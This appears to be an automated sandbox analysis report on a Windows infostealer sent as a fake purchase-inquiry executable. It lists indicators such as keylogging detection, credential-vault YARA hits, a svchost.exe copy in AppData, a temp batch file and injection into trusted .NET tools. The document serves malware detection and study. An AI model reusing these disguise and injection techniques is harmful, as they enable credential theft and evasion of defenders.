                    Source: InstallUtil.exe, 0000000F.00000002.2920560159.0000000005D70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2870944580.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2874204896.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CE1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005D80000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2870897490.0000000000DC6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2870404709.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2926843010.0000000005F90000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002DE6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                    Source: svchost.exe, 0000000A.00000002.1951190826.0000021690011000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1951190826.0000021690133000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2868048682.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: svchost.exe, 0000000A.00000002.1951190826.0000021690011000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1951190826.0000021690133000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2868061435.0000000000437000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002961000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: InstallUtil.exe, 0000000F.00000002.2877570286.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002961000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: InstallUtil.exe, 0000000F.00000002.2877570286.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002961000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: InstallUtil.exe, 0000000F.00000002.2920560159.0000000005D70000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2870944580.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002C03000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.2877570286.0000000002B55000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CE1000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002A17000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2879219152.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005D80000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2927965743.0000000005CC0000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000001A.00000002.2870897490.0000000000DC6000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002CA8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2880930308.0000000002D56000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2930648063.000000000601B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2870404709.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2930648063.0000000005F60000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000025.00000002.2874066632.0000000001001000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2926843010.0000000005F90000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2871849560.0000000000ECD000.00000004.00000020.00020000.00000000.sdmp, jsc.exe, 00000030.00000002.2877901296.0000000002D37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49745 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.4:49759 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, 3DlgK9re6m.cs.Net Code: DXScWpy
                    Source: 10.2.svchost.exe.21690133730.2.raw.unpack, 3DlgK9re6m.cs.Net Code: DXScWpy

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 10.2.svchost.exe.2169004f2c0.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.svchost.exe.21690133730.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 10.2.svchost.exe.21690133730.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Initial sample is a PE file and has a suspicious name
                    Source: initial sampleStatic PE information: Filename: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 41_2_00007FFD9B8D188A NtUnmapViewOfSection,41_2_00007FFD9B8D188A
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeCode function: 0_2_00007FFD9B8B5AB00_2_00007FFD9B8B5AB0
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeCode function: 0_2_00007FFD9B8BA2000_2_00007FFD9B8BA200
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeCode function: 0_2_00007FFD9B8B06200_2_00007FFD9B8B0620
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeCode function: 0_2_00007FFD9B8BD5110_2_00007FFD9B8BD511
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeCode function: 0_2_00007FFD9B8BD1300_2_00007FFD9B8BD130
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeCode function: 0_2_00007FFD9B8B91F20_2_00007FFD9B8B91F2
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeCode function: 0_2_00007FFD9B8C06580_2_00007FFD9B8C0658
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeCode function: 0_2_00007FFD9B8C64780_2_00007FFD9B8C6478
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeCode function: 0_2_00007FFD9B8C58D90_2_00007FFD9B8C58D9
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 8_2_00007FFD9B885AB08_2_00007FFD9B885AB0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 8_2_00007FFD9B88A2008_2_00007FFD9B88A200
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 8_2_00007FFD9B88D1308_2_00007FFD9B88D130
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 8_2_00007FFD9B8806208_2_00007FFD9B880620
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 8_2_00007FFD9B88D5118_2_00007FFD9B88D511
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 8_2_00007FFD9B8859708_2_00007FFD9B885970
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 8_2_00007FFD9B8891F28_2_00007FFD9B8891F2
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 8_2_00007FFD9B8958D98_2_00007FFD9B8958D9
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 8_2_00007FFD9B8906588_2_00007FFD9B890658
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 8_2_00007FFD9B8964788_2_00007FFD9B896478
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 10_2_00007FFD9B8A5AB010_2_00007FFD9B8A5AB0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 10_2_00007FFD9B8AA20010_2_00007FFD9B8AA200
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 10_2_00007FFD9B8AD13010_2_00007FFD9B8AD130
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 10_2_00007FFD9B8AD51110_2_00007FFD9B8AD511
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 10_2_00007FFD9B8A597010_2_00007FFD9B8A5970
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 10_2_00007FFD9B8A91F210_2_00007FFD9B8A91F2
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 10_2_00007FFD9B8B58D910_2_00007FFD9B8B58D9
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 10_2_00007FFD9B8A062010_2_00007FFD9B8A0620
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 10_2_00007FFD9B8B065810_2_00007FFD9B8B0658
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 10_2_00007FFD9B8B647810_2_00007FFD9B8B6478
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_010A4AD015_2_010A4AD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_010A3EB815_2_010A3EB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_010A420015_2_010A4200
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_066B66B815_2_066B66B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_066B87F015_2_066B87F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_066BF7D815_2_066BF7D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_066BB3E015_2_066BB3E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_066B33A015_2_066B33A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_066B004015_2_066B0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_066BE88815_2_066BE888
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_066B000615_2_066B0006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_066B8F2F15_2_066B8F2F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_066BAD0015_2_066BAD00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 15_2_066B59C015_2_066B59C0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 26_2_00F34AD026_2_00F34AD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 26_2_00F3DB2826_2_00F3DB28
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 26_2_00F33EB826_2_00F33EB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 26_2_00F3420026_2_00F34200
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 26_2_066B87F026_2_066B87F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 26_2_066BF7D826_2_066BF7D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 26_2_066BB3E026_2_066BB3E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 26_2_066B33A026_2_066B33A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 26_2_066B004026_2_066B0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 26_2_066BE89826_2_066BE898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 26_2_066B59D026_2_066B59D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 26_2_066B000626_2_066B0006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 26_2_066B8F4026_2_066B8F40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 26_2_066BAD0026_2_066BAD00
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 27_2_00007FFD9B875B1127_2_00007FFD9B875B11
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 27_2_00007FFD9B87A20027_2_00007FFD9B87A200
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 27_2_00007FFD9B87D13027_2_00007FFD9B87D130
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 27_2_00007FFD9B87062027_2_00007FFD9B870620
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 27_2_00007FFD9B87D51127_2_00007FFD9B87D511
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 27_2_00007FFD9B87597027_2_00007FFD9B875970
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 27_2_00007FFD9B8791F227_2_00007FFD9B8791F2
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 27_2_00007FFD9B8858D927_2_00007FFD9B8858D9
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 27_2_00007FFD9B88065827_2_00007FFD9B880658
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 27_2_00007FFD9B88647827_2_00007FFD9B886478
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 37_2_01094AD037_2_01094AD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 37_2_01093EB837_2_01093EB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 37_2_0109420037_2_01094200
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 37_2_06AA66B837_2_06AA66B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 37_2_06AA87F037_2_06AA87F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 37_2_06AAF7D837_2_06AAF7D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 37_2_06AA33A037_2_06AA33A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 37_2_06AAB3E037_2_06AAB3E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 37_2_06AA034D37_2_06AA034D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 37_2_06AA9C4837_2_06AA9C48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 37_2_06AAE88837_2_06AAE888
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 37_2_06AA8F2F37_2_06AA8F2F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 37_2_06AAAD0037_2_06AAAD00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 37_2_06AA59C037_2_06AA59C0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 41_2_00007FFD9B8B062041_2_00007FFD9B8B0620
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 41_2_00007FFD9B8B5B1141_2_00007FFD9B8B5B11
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 41_2_00007FFD9B8B91F241_2_00007FFD9B8B91F2
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 41_2_00007FFD9B8CFB3841_2_00007FFD9B8CFB38
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 41_2_00007FFD9B8CD89741_2_00007FFD9B8CD897
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 41_2_00007FFD9B8CBBBE41_2_00007FFD9B8CBBBE
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 41_2_00007FFD9B8C065841_2_00007FFD9B8C0658
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 41_2_00007FFD9B8BF3A341_2_00007FFD9B8BF3A3
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 41_2_00007FFD9B8BD51141_2_00007FFD9B8BD511
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 41_2_00007FFD9B8BD13041_2_00007FFD9B8BD130
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 41_2_00007FFD9B8C647841_2_00007FFD9B8C6478
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 41_2_00007FFD9B8C58D941_2_00007FFD9B8C58D9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 48_2_010C4AD048_2_010C4AD0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 48_2_010C3EB848_2_010C3EB8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 48_2_010C420048_2_010C4200
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 48_2_06F066B848_2_06F066B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 48_2_06F087F048_2_06F087F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 48_2_06F0F7D848_2_06F0F7D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 48_2_06F0B3E048_2_06F0B3E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 48_2_06F033A048_2_06F033A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 48_2_06F0004048_2_06F00040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 48_2_06F09C4848_2_06F09C48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 48_2_06F0E88848_2_06F0E888
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 48_2_06F0000648_2_06F00006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 48_2_06F08F2F48_2_06F08F2F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 48_2_06F0AD0048_2_06F0AD00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeCode function: 48_2_06F059C048_2_06F059C0
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 456 -p 7792 -ip 7792
                    Source: svchost.exe.0.drStatic PE information: No import functions for PE file found
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeStatic PE information: No import functions for PE file found
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, 00000000.00000000.1606308025.000002091D7B2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameasia.exe* vs RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeBinary or memory string: OriginalFilenameasia.exe* vs RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe
                    Source: 10.2.svchost.exe.2169004f2c0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.svchost.exe.21690133730.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.svchost.exe.21690133730.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exe, IsConstructorBeginFinallyBlock.csCryptographic APIs: 'CreateDecryptor'
                    Source: svchost.exe.0.dr, IsConstructorBeginFinallyBlock.csCryptographic APIs: 'CreateDecryptor'
                    Source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, slKb.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, mAKJ.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, xQRSe0Fg.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, n3rhMa.csCryptographic APIs: 'CreateDecryptor'
                    Source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, MQzE4FWn.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, nSmgRyX5a1.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, 6IMLmJtk.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 10.2.svchost.exe.2169004f2c0.3.raw.unpack, 6IMLmJtk.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: svchost.exe, 00000008.00000002.2008517923.000001A4FFF58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
                    Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@87/48@3/3
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to behavior
                    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8396
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\vexplorers\vexplorers.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9004:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7268:120:WilError_03
                    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7872
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
                    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7792
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8404:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8668:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5080:120:WilError_03
                    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7748
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9188:120:WilError_03
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeFile created: C:\Users\user\AppData\Local\Temp\tmp89F4.tmpJump to behavior
                    Source: C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp89F4.tmp.bat""
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRY.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
